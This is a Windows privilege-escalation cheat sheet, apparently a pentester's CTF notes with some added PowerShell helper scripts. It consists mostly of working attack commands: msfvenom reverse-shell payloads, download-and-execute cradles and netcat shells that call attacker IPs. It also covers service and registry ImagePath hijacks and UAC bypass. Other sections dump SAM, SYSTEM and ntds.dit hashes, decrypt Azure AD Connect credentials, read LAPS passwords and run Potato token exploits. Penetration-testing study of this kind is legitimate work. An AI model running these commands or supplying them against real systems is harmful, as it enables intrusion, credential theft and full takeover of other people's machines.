Privilege Escalation - Windows 👑
Checklist: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
See also: PayloadsAllTheThings - https://github.com/swisskyrepo/PayloadsAllTheThings
01. Common Tricks
01.1 UAC Bypass
DLL Hijacking UAC Bypass (SystemPropertiesAdvanced.exe)
## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If autoElevate is true in the manifest, we are good to go!!
## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack
## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
### If you get an error saying "This operation requires an interactive window",
### launch it from a C2 session instead (e.g. use GreatSCT/MSBuild to launch Meterpreter)
## ------------------| Use with interactive shell
### Create a payload and gain a shell using the following method
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### then migrate into explorer.exe so the process owns an interactive window station
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
01.2 If you have, are in, or can...?
AlwaysInstallElevated check
## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
## Both queries must show a value named "AlwaysInstallElevated" of type REG_DWORD set to 0x1.
## The policy is only in effect when it is enabled in BOTH hives (HKLM and HKCU);
## then msiexec installs any MSI a user hands it with SYSTEM privileges.
## ------------------| Exploit
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi
## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
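Added example (not from the original page): a check that reads both policy keys and only reports the setting as exploitable when both hives hold 1, which is the condition described in the comments above. Nothing is assumed beyond a PowerShell host on the target.

```powershell
# Added example (not from the original page). AlwaysInstallElevated is only
# exploitable when BOTH the HKLM and HKCU policy values are a REG_DWORD of 1;
# one hive alone makes msiexec ignore the policy.
function Test-AlwaysInstallElevated {
    $hives = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($h in $hives.Keys) {
        # The key is usually absent on a hardened host; treat "missing" as 0
        $v = Get-ItemProperty -Path $hives[$h] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$h] = if ($null -ne $v) { [int]$v.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $state.HKLM
        HKCU        = $state.HKCU
        Exploitable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

Test-AlwaysInstallElevated
# When Exploitable is True, the "msiexec /quiet /qn /i pw3n.msi" step above runs the package as SYSTEM
```

If only one hive reports 1 the msiexec run will still succeed, but it executes with the caller's own token, so check both before bothering to build the MSI.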
If you are LOCAL SERVICE or NETWORK SERVICE
## ------------------| How to check
whoami /all
## nt authority\local service <--
## ------------------| Recover the account's default privileges (incl. SeImpersonatePrivilege) with FullPowers
wget https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe
## Upload it to the machine and run it; the new shell has the service account's full default privilege set
.\FullPowers.exe
If you have SeDebugPrivilege?
## ------------------| How to check
whoami /priv
## Look for SeDebugPrivilege and note whether its state is Enabled or Disabled
## ------------------| If it's Disabled, enable it
### Using Enable-Privilege.ps1 (may not work over a remote/network logon)
wget https://raw.githubusercontent.com/proxb/PoshPrivilege/master/PoshPrivilege/Scripts/Enable-Privilege.ps1
IEX(New-Object Net.WebClient).downloadString('http://<IP>/Enable-Privilege.ps1')
Enable-Privilege -Privilege SeDebugPrivilege
### Or spawn a fresh logon session with RunasCs (needs the user's password) and check again from there
## .Net v2.0
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/RunasCs/DotNet-v2.0/RunasCs.exe
## .Net v4.0
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/RunasCs/DotNet-v4.0/RunasCs.exe
RunasCs.exe <UserName> <Password> cmd -r <IP>:4545
## In the new shell, run powershell and check whoami /priv again
## ------------------| If it's Enabled
### Try to use meterpreter and migrate it to admin process
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; exploit"
getprivs ## check if we have SeDebugPrivilege
### then run the .\h4rithd.exe
### then find a SYSTEM process (e.g. winlogon.exe) and migrate into it
migrate <PID>
### Or, if your shell came from psexec or evil-winrm, use psgetsystem
wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
IEX(New-Object Net.WebClient).downloadString('http://<IP>/psgetsys.ps1')
ImpersonateFromParentPid -ppid <PID> -command "cmd.exe" -cmdargs "/c ping <IP>"
If you have SeBackupPrivilege and SeRestorePrivilege?
## ------------------| How to check is enabled
whoami /priv | findstr "SeBackupPrivilege SeRestorePrivilege"
## ------------------| Copy those SYSTEM Hives to current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
#### The Active Directory database (ntds.dit) is locked while the DC is running, so take it from a shadow copy
## ------------------| Create diskshadow script on local
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
## ------------------| Convert the script to Windows format and upload it.
unix2dos script.txt
## ------------------| Use Diskshadow to backup C drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:
## ------------------| Use robocopy in backup mode (/B) to copy E:\Windows\ntds\ntds.dit
robocopy /B E:\Windows\ntds . ntds.dit
# Download SAM, SYSTEM and ntds.dit, then feed them to secretsdump.py to get the Administrator hash
## ------------------| Using wbadmin.exe
## wbadmin needs the backup target to be an NTFS/ReFS volume, so back the Samba share with an NTFS image:
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./
echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
If you have SeLoadDriverPrivilege?
## ------------------| Download and upload following files to machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe
## ------------------| Create payload and upload
msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe   # ExploitCapcom launches the payload from this path; start the listener first
## Load the signed-but-vulnerable Capcom driver (EoPLoadDriver creates the service key under HKCU and calls NtLoadDriver)
.\EoPLoadDriver.exe System\CurrentControlSet\MyService <Path-To>\Capcom.sys
.\ExploitCapcom.exe
If you have ExecuteDCOM (Distributed COM Users) membership?
## ------------------| Using Impacket
impacket-dcomexec <USER>:'<PASS>'@<IP> 'ping -n 2 <IP>' -object MMC20 -shell-type cmd -silentcommand
## ------------------| Using NetExec
nxc smb $IP -u <USER> -p '<PASS>' --exec-method mmcexec -x 'ping -n 2 <IP>'
If the user is in the DnsAdmins group?
## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll
## ------------------| Create SMB share on local machine
impacket-smbserver share ./
## ------------------| Do this on owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Start a netcat listener, then
sc.exe start dns
If you have GenericAll on user jorden
## ------------------| Enable PreAuth for user Jorden
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true
## ------------------| Then run this
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass
If you have GenericWrite on a service
## ------------------| Check that you can query the service configuration
sc.exe qc UsoSVC
## ------------------| If that works, exploit (the space after binpath= and start= is required)
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""
sc.exe stop UsoSVC
sc.exe config UsoSVC start= auto
sc.exe start UsoSVC
If you have xp_dirtree?
## Start Responder on the attacking interface (-I selects the interface)
sudo responder -I tun0
## Execute from the Windows host; the SQL Server service account authenticates to our share
sqlcmd -Q "EXEC xp_dirtree '\\YourIP\test'"
## Get the NetNTLMv2 hash and crack it with
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
If you are in the Azure Admins group?
## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/
## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
If you are a member of the Event Log Readers group.
wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')
# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*
# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName
# Command line process login (A new process has been created)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap
## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
If you are in the WSUS Administrators group? SharpWSUS
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait for 5-6 minutes
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
If you are a member of the Administrators group, but still stuck?
## List Administrators group members
net localgroup Administrators
## Simple UAC bypass for file access: map the admin share over loopback
net use h: \\127.0.0.1\c$
h:
dir
If you are in LAPS_Readers
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path c:\windows\temp\laps.csv -NoTypeInformation
Hijacking/Migrating login sessions.
## ------------------| Check who is logged on and which sessions exist
tasklist /v
## ------------------| Get into a session
## Create payload
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Look for explorer.exe (it is more stable), then copy its PID
migrate <PID>
01.3 Service / Registry Exploits
## ------------------| Enumeration [you need SERVICE_START & SERVICE_STOP permissions on the target service]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
## ------------------| Check Permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Check BUILTIN\Users:(I)(F) permission
## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>
## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
## Set automatic start
sc config <service_name> start= auto
## Remove dependencies
sc config <service_name> depend= ""
## ------------------| Restart service
cmd   ## the wmic query below is cmd.exe syntax
wmic service where caption="<ServiceName>" get name, caption, state, startmode
## If StartMode is Auto, a reboot restarts the service for us
## Check if we have the privilege to reboot the machine (SeShutdownPrivilege)
whoami /priv
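The accesschk calls above (and the `sc.exe qc` check in the GenericWrite-on-services section) answer "who may reconfigure this service". As an added example, not from the original page, the same answer from built-ins only: `sc.exe sdshow` prints the service DACL as SDDL, .NET's RawSecurityDescriptor parses it, each ACE's access mask is decoded with the SERVICE_* constants and matched against the SIDs in the current token. `UsoSvc` in the last line is just the service name used earlier on this page; substitute any service.

```powershell
# Added example (not from the original page). Decode a service DACL with built-ins:
# sc.exe sdshow prints SDDL, RawSecurityDescriptor parses it, and the access masks
# are decoded with the SERVICE_* constants and matched against the current token.
$ServiceRights = @{
    SERVICE_QUERY_CONFIG         = 0x0001
    SERVICE_CHANGE_CONFIG        = 0x0002   # change binPath= : the right the sc config attack needs
    SERVICE_QUERY_STATUS         = 0x0004
    SERVICE_ENUMERATE_DEPENDENTS = 0x0008
    SERVICE_START                = 0x0010
    SERVICE_STOP                 = 0x0020
    SERVICE_PAUSE_CONTINUE       = 0x0040
    SERVICE_INTERROGATE          = 0x0080
    SERVICE_USER_DEFINED_CONTROL = 0x0100
    DELETE                       = 0x10000
    READ_CONTROL                 = 0x20000
    WRITE_DAC                    = 0x40000  # rewrite the DACL and grant yourself anything
    WRITE_OWNER                  = 0x80000
    GENERIC_ALL                  = 0x10000000
}
$TakeoverRights = 'SERVICE_CHANGE_CONFIG', 'WRITE_DAC', 'WRITE_OWNER', 'GENERIC_ALL'

function ConvertFrom-ServiceAccessMask {
    param([Parameter(Mandatory)][uint32]$Mask)
    $ServiceRights.Keys | Where-Object { ($Mask -band $ServiceRights[$_]) -ne 0 } | Sort-Object
}

function Get-ServiceDacl {
    param([Parameter(Mandatory)][string]$Name)
    # sdshow output is a blank line followed by the SDDL string; plain 'sc' is Set-Content in PowerShell
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^[DOGS]:' }) -join ''
    if (-not $sddl) { throw "sc.exe sdshow $Name returned no security descriptor" }
    $sd   = New-Object -TypeName Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [Security.AccessControl.CommonAce]) { continue }
        # AccessMask is a signed int; mask to 32 bits so GENERIC_* high bits do not go negative
        $rights = @(ConvertFrom-ServiceAccessMask -Mask ([uint32]($ace.AccessMask -band 0xFFFFFFFF)))
        try   { $who = $ace.SecurityIdentifier.Translate([Security.Principal.NTAccount]).Value }
        catch { $who = $ace.SecurityIdentifier.Value }
        [pscustomobject]@{
            Service     = $Name
            Principal   = $who
            Type        = $ace.AceQualifier                    # AccessAllowed / AccessDenied
            AppliesToMe = ($mine -contains $ace.SecurityIdentifier.Value)
            Rights      = ($rights -join ',')
            Takeover    = ($ace.AceQualifier -eq 'AccessAllowed') -and
                          [bool]($rights | Where-Object { $TakeoverRights -contains $_ })
        }
    }
}

# Rows with AppliesToMe and Takeover both true are the ones the sc config attack works against
Get-ServiceDacl -Name UsoSvc | Format-Table -AutoSize
```

The SDDL abbreviations you see in `sdshow` output (CC, DC, LC, SW, RP, WP, DT, LO, CR) are the low nine bits decoded here; `DC` (SERVICE_CHANGE_CONFIG) granted to Authenticated Users or BUILTIN\Users is the classic finding. Deny ACEs are listed but not subtracted from the allow set, so read the full table rather than only the Takeover column.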
Insecure Service Executables
## ------------------| Check
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
## ------------------| Exploit
## Back up the original binary, then replace it with shell.exe
## Start the service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
Unquoted Service Paths
## ------------------| Intro: how Windows resolves an unquoted path that contains spaces
## Service binary: C:\Program Files\One Folder\Two Folder\Executable.exe
## CreateProcess tries these, in order, before reaching the real file:
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\One Folder\Two Folder\Executable.exe
## e.g. C:\Program Files\A Subfolder\Two Folder\Executable.exe is hijacked the same way
## ------------------| Check for unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v "'"
## ------------------| Check if we have
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
### Write permission [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwdq <path>
## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name>
sc STOP <service_name>
sc START <service_name>
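Added example (not from the original page) that turns the rule from the intro into a check: `Get-HijackCandidate` reproduces the CreateProcess search order for any unquoted path, and `Find-UnquotedServicePath` applies it to every installed service and probes whether the current user can actually drop a file into each candidate directory. It assumes only a PowerShell 5.1+ host with CIM available; the write test creates and deletes an empty randomly named file, so expect a trace in file-creation telemetry.

```powershell
# Added example (not from the original page). Reproduce the CreateProcess search
# order for an unquoted service path and test each candidate directory for write access.
function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$PathName)
    # Keep only the executable part; anything after ".exe" is arguments
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $tokens = $m.Groups[1].Value -split ' '
    # "C:\Program Files\One Folder\Two Folder\Executable.exe" ->
    # C:\Program.exe, C:\Program Files\One.exe, C:\Program Files\One Folder\Two.exe
    $candidates = @()
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        $candidates += (($tokens[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-WritableDirectory {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # Probing with a real file is more reliable than evaluating the ACL by hand
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p -match '^\s*"') { continue }          # quoted or empty: not vulnerable
        $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        # Only a space inside the executable path makes it ambiguous; skip C:\Windows\*
        # because those directories are not writable by standard users anyway
        if ($exe -notmatch ' ' -or $exe -match '^[A-Za-z]:\\Windows\\') { continue }
        foreach ($c in Get-HijackCandidate -PathName $p) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Candidate = $c
                Writable  = Test-WritableDirectory -Path (Split-Path -Parent $c)
            }
        }
    }
}

# Offline check of the path used in the intro above
Get-HijackCandidate -PathName 'C:\Program Files\One Folder\Two Folder\Executable.exe'
# Live check: only rows where we can actually plant the binary
Find-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

A writable candidate is only useful if the service runs as a higher-privileged account (RunsAs) and you can restart it or it starts automatically on boot, which is why StartMode and RunsAs are carried into the output next to each candidate.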
Weak Registry Permissions
## ------------------| Verify [look for write access granted to NT AUTHORITY\INTERACTIVE, BUILTIN\Users or Authenticated Users]
Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>
## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>
## ------------------| Check current values [ImagePath, and ObjectName == LocalSystem]
reg query HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>
## ------------------| Overwrite ImagePath (reg.exe does not understand the HKLM: PSDrive prefix; ImagePath is REG_EXPAND_SZ)
reg add HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName> /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f
net start <service_name>
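Added example (not from the original page): enumerate every key under HKLM\SYSTEM\CurrentControlSet\Services whose ACL grants a write-class right to a SID the current token holds, and show ImagePath and ObjectName for each hit so you can see which account a repointed ImagePath would run as. It assumes nothing beyond PowerShell on the target. It evaluates Allow ACEs only and ignores Deny entries and generic-right bits, so treat a hit as a lead to confirm with the `reg query` above, not as proof.

```powershell
# Added example (not from the original page). List service keys the current user
# can modify; a writable key means ImagePath can be repointed at our binary.
function Get-WritableServiceKey {
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })   # SIDs in our token
    # Any of these rights is enough to plant a new ImagePath (or to grant ourselves more)
    $writeBits = [Security.AccessControl.RegistryRights]::SetValue -bor
                 [Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [Security.AccessControl.RegistryRights]::WriteKey -bor
                 [Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [Security.AccessControl.RegistryRights]::TakeOwnership -bor
                 [Security.AccessControl.RegistryRights]::FullControl
    foreach ($key in Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\Services -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.RegistryRights -band $writeBits) -eq 0) { continue }
            # Resolve the ACE principal to a SID so it can be matched against the token
            try   { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($mine -notcontains $sid) { continue }
            $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                ImagePath = $props.ImagePath
                RunsAs    = $props.ObjectName      # LocalSystem is the prize
            }
        }
    }
}

# Run as the low-privileged user; SYSTEM/Administrators hits are expected when run elevated
Get-WritableServiceKey | Format-Table -AutoSize
```

Because the comparison is done on SIDs from the live token, group-based grants (for example to NT AUTHORITY\INTERACTIVE, which only interactive logons carry) are judged for the session you actually have, not for the account in the abstract.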
02. Tools
02.1 PowerUp
## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')"
## ------------------| Best check
Invoke-AllChecks
Get-CurrentUserTokenGroupSid
Get-RegistryAutoLogon
## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'
02.2 PowerUpSQL
# Download
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1
# Upload
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')
# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20
02.3 Seatbelt
# Run ALL enumeration checks
Seatbelt.exe -group=all
02.4 SecretsDump
## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local
## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161
# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank
# aad3b435b51404eeaad3b435b51404ee <-- blank [LM]
## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local
## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
03. Common Exploits
03.0 GodPotato (New)
## ------------------| Download
#### .Net4
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe -O GodPotato.exe
#### .Net3.5
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe -O GodPotato.exe
#### .Net2
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe -O GodPotato.exe
## ------------------| Exploit
.\GodPotato.exe -cmd "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA=="
03.0 JuicyPotatoNG (New)
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is Enabled, we are good!! 👌👌👌
## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip
unzip JuicyPotatoNG.zip
## ------------------| After uploading it to the victim, create the bat file (no quotes, or cmd treats the whole line as one file name)
echo powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== > C:\programdata\shell.bat
type C:\programdata\shell.bat
## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat
03.1 Juicy Potato (Abusing the golden privileges)
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is Enabled, we are good!! 👌👌👌
## ------------------| Create .bat script
## Shell through Netcat
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through PowerShell (use this line as the .bat content)
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')
## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100
## ------------------| Execute
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337
## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
